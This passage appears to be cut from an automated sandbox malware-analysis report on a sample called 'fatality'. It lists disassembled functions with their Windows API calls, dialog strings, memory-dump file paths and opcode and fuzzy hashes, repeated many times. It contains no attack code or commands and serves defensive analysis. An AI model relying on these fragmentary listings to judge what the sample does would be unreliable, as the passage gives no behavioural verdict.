                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 008FD675
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 008FD684
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                            • String ID: RENAMEDLG
                                                                                                                                                            • API String ID: 445417207-3299779563
                                                                                                                                                            • Opcode ID: bdc216b3f0e552cd546642af440d8bd2dc7d8039c4ea7ecd118155c54ef6409e
                                                                                                                                                            • Instruction ID: 5688b4fdbf66b230ebd93af576b91348e8ea43531ede2e8a9aaa72bee48d6d4e
                                                                                                                                                            • Opcode Fuzzy Hash: bdc216b3f0e552cd546642af440d8bd2dc7d8039c4ea7ecd118155c54ef6409e
                                                                                                                                                            • Instruction Fuzzy Hash: 1501F533699318BAD2204F749D09FB6775EFBABB01F218110F345E2091C7A69904ABA5
                                                                                                                                                            Function 0090C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 0090C817
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 0090C829
                                                                                                                                                            • _free.LIBCMT ref: 0090C83B
                                                                                                                                                            • _free.LIBCMT ref: 0090C84D
                                                                                                                                                            • _free.LIBCMT ref: 0090C85F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            • Opcode ID: 1e2f8c468aaf6b1ce3c3d3440e98a0ae005adfac69e60a4dddd39603d0da47dc
                                                                                                                                                            • Instruction ID: 0f2a02c01664e409650dac7cb37d982ae9a6845e503276a70121eee6536e1cbc
                                                                                                                                                            • Opcode Fuzzy Hash: 1e2f8c468aaf6b1ce3c3d3440e98a0ae005adfac69e60a4dddd39603d0da47dc
                                                                                                                                                            • Instruction Fuzzy Hash: ACF06272724201AFC620DB68E489D4B77EDBB40B10B548919F949D75D2CB70FC80CA58
                                                                                                                                                            Function 008FB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                            • IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                            • TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1266772231-0
                                                                                                                                                            • Opcode ID: 0a0c418210da7fc7c22ceb6bef38b600d37a12832a976ed93efdc2c1c4c0111b
                                                                                                                                                            • Instruction ID: 734d87d3a6db3f09f543d2fad09e103fe726afcefcde0c7d0bb7a9190bad7e37
                                                                                                                                                            • Opcode Fuzzy Hash: 0a0c418210da7fc7c22ceb6bef38b600d37a12832a976ed93efdc2c1c4c0111b
                                                                                                                                                            • Instruction Fuzzy Hash: 92F0D075A1511AAB8B20AFF5DC4CDEB7FBCEE063917008515B505D2050EB38D605DBB0
                                                                                                                                                            Function 00908900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _free.LIBCMT ref: 0090891E
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 00908930
                                                                                                                                                            • _free.LIBCMT ref: 00908943
                                                                                                                                                            • _free.LIBCMT ref: 00908954
                                                                                                                                                            • _free.LIBCMT ref: 00908965
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            • Opcode ID: f9c8a9a16d0efc1685209b63f5c229e7c2ace5ed2d670fc9b4120544b6616f55
                                                                                                                                                            • Instruction ID: e6f38b9c1e76204bfaac0be122928f58eb429bdeaea1d81e9320e26a15e166b1
                                                                                                                                                            • Opcode Fuzzy Hash: f9c8a9a16d0efc1685209b63f5c229e7c2ace5ed2d670fc9b4120544b6616f55
                                                                                                                                                            • Instruction Fuzzy Hash: A2F05E79A382238FC60A7F14FC0694A3FB5F7267107810706F868522F1CB714941FB81
                                                                                                                                                            Function 008FCE87 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EB690: _wcslen.LIBCMT ref: 008EB696
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FCED1
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,0092946A), ref: 008FCEF1
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FCFFE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DialogItemText_swprintf_wcslen
                                                                                                                                                            • String ID: %s%s%u
                                                                                                                                                            • API String ID: 2997164916-1360425832
                                                                                                                                                            • Opcode ID: 16b32bc806b1fff6ddf31ec363ca79d7539a1940791714950fd09e332cf2f9ee
                                                                                                                                                            • Instruction ID: 3a8aeada7b2b8a3f619dabc284e4b2e9cfc36d8c615e0b55c27f910a8fa4a413
                                                                                                                                                            • Opcode Fuzzy Hash: 16b32bc806b1fff6ddf31ec363ca79d7539a1940791714950fd09e332cf2f9ee
                                                                                                                                                            • Instruction Fuzzy Hash: 174192B190065DAADF24AB64CC45EFA77BCFB45304F4080A6FB09E7151EE708A85DF62
                                                                                                                                                            Function 008EBB03 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 127COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: UNC$\\?\
                                                                                                                                                            • API String ID: 176396367-253988292
                                                                                                                                                            • Opcode ID: 19ef7eca80de6992f99b0109af0e7d87d228709d837595674bcdf4186542b747
                                                                                                                                                            • Instruction ID: 7bf9ab8078647d469414958ad5621c8981205a9377a29db309008579486e31c2
                                                                                                                                                            • Opcode Fuzzy Hash: 19ef7eca80de6992f99b0109af0e7d87d228709d837595674bcdf4186542b747
                                                                                                                                                            • Instruction Fuzzy Hash: FA41D23150429DAACF21AF66CC01EEB77B8FF46394F208026F954F3151DBB4EA90CA61
                                                                                                                                                            Function 008FAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FAD98
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 008FADAD
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 008FADC2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                            • String ID: ASKNEXTVOL
                                                                                                                                                            • API String ID: 445417207-3402441367
                                                                                                                                                            • Opcode ID: 804afa85ed03db165e0d748db4430aa02c2abe9c047b4f2ffeed38e9af55834b
                                                                                                                                                            • Instruction ID: 978f18ff63b0d696bf5215b3d63ef53089d681cdd365f9af4c4e1f20bf2c36cc
                                                                                                                                                            • Opcode Fuzzy Hash: 804afa85ed03db165e0d748db4430aa02c2abe9c047b4f2ffeed38e9af55834b
                                                                                                                                                            • Instruction Fuzzy Hash: F811D672284208AFD715AFB8EC45F7A7769FF4B752F004100F344DB5A0C761A945A723
                                                                                                                                                            Function 008FB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FB2BE
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 008FB2D6
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 008FB304
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                            • API String ID: 445417207-3292211884
                                                                                                                                                            • Opcode ID: 04bd15d6e27c8d27e3b14b6147a58ca05478d28dd0c86a08b805d02e22db3309
                                                                                                                                                            • Instruction ID: 8c35bd90ed72ca5752e3b2d151ef87c97b1f9ac2c71fc13cae340dcea9a6b3cc
                                                                                                                                                            • Opcode Fuzzy Hash: 04bd15d6e27c8d27e3b14b6147a58ca05478d28dd0c86a08b805d02e22db3309
                                                                                                                                                            • Instruction Fuzzy Hash: F811AD32A4411CBADB229AB8DC49FFE77ACFB5A754F104020FB45F3180C7B59A4597A1
                                                                                                                                                            Function 008FDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                            • API String ID: 0-56093855
                                                                                                                                                            • Opcode ID: 1c284e13f68f8e7cfbb815199b3555f2af3db2bdc284e1750313c8c70788f5a3
                                                                                                                                                            • Instruction ID: 3d949d263fc499b0c87f04eb7b1dc6dce1ea4be007a2287a3ac8c3edb6d5eaa6
                                                                                                                                                            • Opcode Fuzzy Hash: 1c284e13f68f8e7cfbb815199b3555f2af3db2bdc284e1750313c8c70788f5a3
                                                                                                                                                            • Instruction Fuzzy Hash: EA015E7662834DAFD721AFB4EC44AAB7BAAF759358B004425FB05C2270D6319C51FBA0
                                                                                                                                                            Function 00902BDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                            • Opcode ID: 98236f3dd466f09c99f8155716da8a64a263ece1390e234139e0bc7a387919c7
                                                                                                                                                            • Instruction ID: 2e80245714198e35693f46607b2835c0d2f5c5d23e8a14e93ca5867b9c0c00c5
                                                                                                                                                            • Opcode Fuzzy Hash: 98236f3dd466f09c99f8155716da8a64a263ece1390e234139e0bc7a387919c7
                                                                                                                                                            • Instruction Fuzzy Hash: 4651D672600226AFEB298F14D849BBA77ACFF94310F24456DEC45876E1E731ED80D790
                                                                                                                                                            Function 008FFD10 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
